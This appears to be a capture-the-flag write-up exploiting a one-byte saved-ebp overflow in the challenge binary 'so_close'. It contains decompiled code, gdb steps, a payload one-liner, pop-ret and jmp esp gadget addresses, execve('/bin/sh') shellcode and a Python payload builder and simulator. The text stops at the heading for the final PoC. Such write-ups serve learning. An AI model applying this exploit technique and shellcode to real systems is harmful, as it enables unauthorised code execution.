Challenge:
Yet so far :( /home/so_close on the shell.
I'm starting to study pwn, so this challenge took me a lot of time.
To solve it, I'll walk through two steps:
Step 1: Find the vulnerability
Drag the so_close binary into IDA, press F5, and you see the following code:
ssize_t __cdecl completely_secure(char a1)
{
  char buf;       // [sp+Ch] [bp-10Ch]@1
  size_t nbytes;  // [sp+10Ch] [bp-Ch]@1

  nbytes = &a1 - &buf - 4;
  puts("something something something..");
  return read(0, &buf, nbytes);
}
Yes, it reads 272 bytes into buf: the argument a1 sits at ebp+8 and buf at ebp-0x10C, so nbytes = &a1 - &buf - 4 = (ebp+8) - (ebp-0x10C) - 4 = 0x114 - 4 = 0x110 = 272 (you can also find this by fuzzing). buf is only 0x10C = 268 bytes below the saved ebp, so the read covers buf plus the 4-byte saved ebp and stops exactly 4 bytes short of the return address. We get a stack buffer overflow, but one that can only reach the saved ebp, not eip.
Let's check the binary's protections:
ASLR is on! Overwriting eip with the address of shellcode on the stack would not work anyway, because that address changes every run (and the read cannot reach eip), so we need a cleverer way.
I decided to overwrite only the lowest byte of the saved ebp. The saved ebp is itself a stack address (the caller's frame pointer), so replacing its last byte with a small value such as \x0a (another small value also works) moves it a little lower on the stack, towards the start of our buffer, without having to know the rest of the address. When the caller then executes leave (mov esp, ebp; pop ebp) and ret, esp is taken from the value we corrupted, so the address ret pops into eip comes from memory we control.
Let's debug to see the effect:
Build the payload:
python -c "import sys; sys.stdout.write('A'*268+'\x0a')" > /tmp/tsu
(sys.stdout.write rather than print: print would append a newline, a second 0x0a byte that would land in the next byte of the saved ebp.)
Debug so_close with gdb-peda:
gdb so_close
Set a breakpoint at the call to read:
gdb-peda$ br *0x8048467
Feed the payload to it:
gdb-peda$ r < /tmp/tsu
So when the ret that follows the caller's leave executes, our program jumps to an address popped from near the start of our buffer on the stack.
Step 2: Build the payload with a ROP slide and shellcode to raise the probability of success
From the step above we know that overwriting the last byte of the saved ebp with a small value sends execution to an address read from near the start of the stack buffer, but we do not know the exact offset. So we fill the buffer with a long chain of POP-RET gadget addresses, followed by the address of a JMP ESP, a \x90 sled and the shellcode. Wherever the corrupted ebp lands inside the chain, each pop; ret advances 8 bytes until the JMP ESP address is popped into eip; jmp esp then continues at the bytes right after it, the NOP sled, which slides into the shellcode. Look at this picture and you will see why:
Let's find their addresses:
popret_gadget = 0x080482d1
jmp_esp = 0x0804859f
and we use this 38-byte execve("/bin/sh") shellcode:
shell = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"
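The following Python 3 model is an added example, not the writeup's PoC. It ties together the frame arithmetic from Step 1 (buf at ebp-0x10C, a 272-byte read that ends at the saved ebp) and the layout from Step 2: build_payload() lays out the pop; ret slide, the jmp esp address, the NOP sled and the shellcode in the 268 bytes before the saved ebp, and simulate() emulates what the caller's leave; ret does once the low byte of the saved ebp is 0x0a. The gadget addresses, shellcode and offsets are the ones on this page; the caller's frame size, the sample ebp values and the 16-byte stack alignment assumed by success_rate() are constructed for the model, and the two bytes of lead padding follow from my own alignment argument in the comments, not from the original payload.

```python
import struct

# Values taken from the writeup.
POPRET = 0x080482d1    # pop ; ret gadget
JMP_ESP = 0x0804859f   # jmp esp
BUF_OFF = 0x10C        # buf is at ebp-0x10C: 268 bytes reach the saved ebp
READ_LEN = 0x110       # read(0, buf, 272): buf plus the 4-byte saved ebp
SHELLCODE = (b"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
             b"\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff"
             b"\xff\xff/bin/shX")   # 38-byte execve("/bin/sh")


def p32(v):
    return struct.pack("<I", v)


def build_payload(nop_len=32, ebp_low=0x0a):
    """268 bytes of buffer content plus the byte that replaces the low byte of
    the saved ebp.  Returns (payload, layout); layout maps each region to its
    offset inside buf.

    Alignment (my reasoning, not from the writeup): ebp is 4-byte aligned, so
    after the caller's `leave` esp sits at ...(ebp_low + 4), which is
    ebp_low % 4 bytes past a 4-byte boundary.  buf is 4-byte aligned as well,
    so the gadget addresses must start ebp_low % 4 bytes into the buffer or
    every dword the slide pops straddles two of them.
    """
    lead = b"A" * (ebp_low % 4)
    room = BUF_OFF - len(lead) - 4 - len(SHELLCODE) - nop_len  # bytes left for the slide
    if room < 8:
        raise ValueError("no room for a slide; shrink nop_len")
    n_slide, extra = divmod(room, 4)   # leftover bytes just lengthen the sled
    slide = p32(POPRET) * n_slide
    tail = p32(JMP_ESP) + b"\x90" * (nop_len + extra) + SHELLCODE
    payload = lead + slide + tail + bytes([ebp_low])
    assert len(payload) == BUF_OFF + 1
    start = len(lead)
    layout = {"slide": (start, start + len(slide)),
              "jmp_esp": start + len(slide),
              "sled": start + len(slide) + 4,
              "shellcode": BUF_OFF - len(SHELLCODE)}
    return payload, layout


def simulate(payload, caller_ebp, caller_frame=0x20):
    """Emulate the caller's `leave; ret` after completely_secure returns.

    caller_ebp   - value of the saved ebp before our write (constructed)
    caller_frame - bytes between the caller's ebp and completely_secure's ebp
                   (its locals, return address, saved ebp; constructed)
    Returns the buffer offset `jmp esp` lands on, or None when the chain
    reads memory we do not control or pops something that is not a gadget.
    """
    buf = caller_ebp - caller_frame - BUF_OFF            # where read() wrote
    corrupted = (caller_ebp & ~0xff) | payload[BUF_OFF]  # only the low byte changed
    mem = payload[:BUF_OFF] + p32(corrupted)             # the 272 bytes we control

    def read32(addr):
        off = addr - buf
        if 0 <= off and off + 4 <= len(mem):
            return struct.unpack("<I", mem[off:off + 4])[0]
        return None   # outside the buffer: unknown data, treat it as a crash

    esp = corrupted + 4                  # leave: mov esp, ebp ; pop ebp
    eip = read32(esp); esp += 4          # ret
    while eip == POPRET:                 # each pop; ret swallows one dword, then rets
        esp += 4
        eip = read32(esp); esp += 4
    return esp - buf if eip == JMP_ESP else None


def success_rate(payload, layout, caller_frame=0x20, base=0xffffd000):
    """Try every place the randomised stack can put the caller's ebp inside one
    256-byte window (low nibble fixed at 8 by 16-byte stack alignment, upper
    nibble random) and count how many reach the NOP sled."""
    hits = 0
    for hi in range(16):
        caller_ebp = base + (hi << 4) + 0x8
        if simulate(payload, caller_ebp, caller_frame) == layout["sled"]:
            hits += 1
    return hits, 16


if __name__ == "__main__":
    payload, layout = build_payload()
    print(layout)
    print("hits per 16 stack positions:", success_rate(payload, layout))
    print("same, caller frame 4 bytes larger:", success_rate(payload, layout, caller_frame=0x24))
```

Running success_rate() shows the two ways an attempt dies: the corrupted ebp points past the slide (into the sled, the shellcode or beyond the buffer), or the distance from the landing point to the jmp esp address is not a multiple of 8, so a pop swallows that address and the next ret pops 0x90909090. The first depends on where the randomised stack ended up and is why the author speaks of probability; the second is fixed for a given binary and environment, so if every attempt crashes, move the jmp esp address by 4 bytes (change nop_len by 4) and try again.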
Finally, here is the PoC: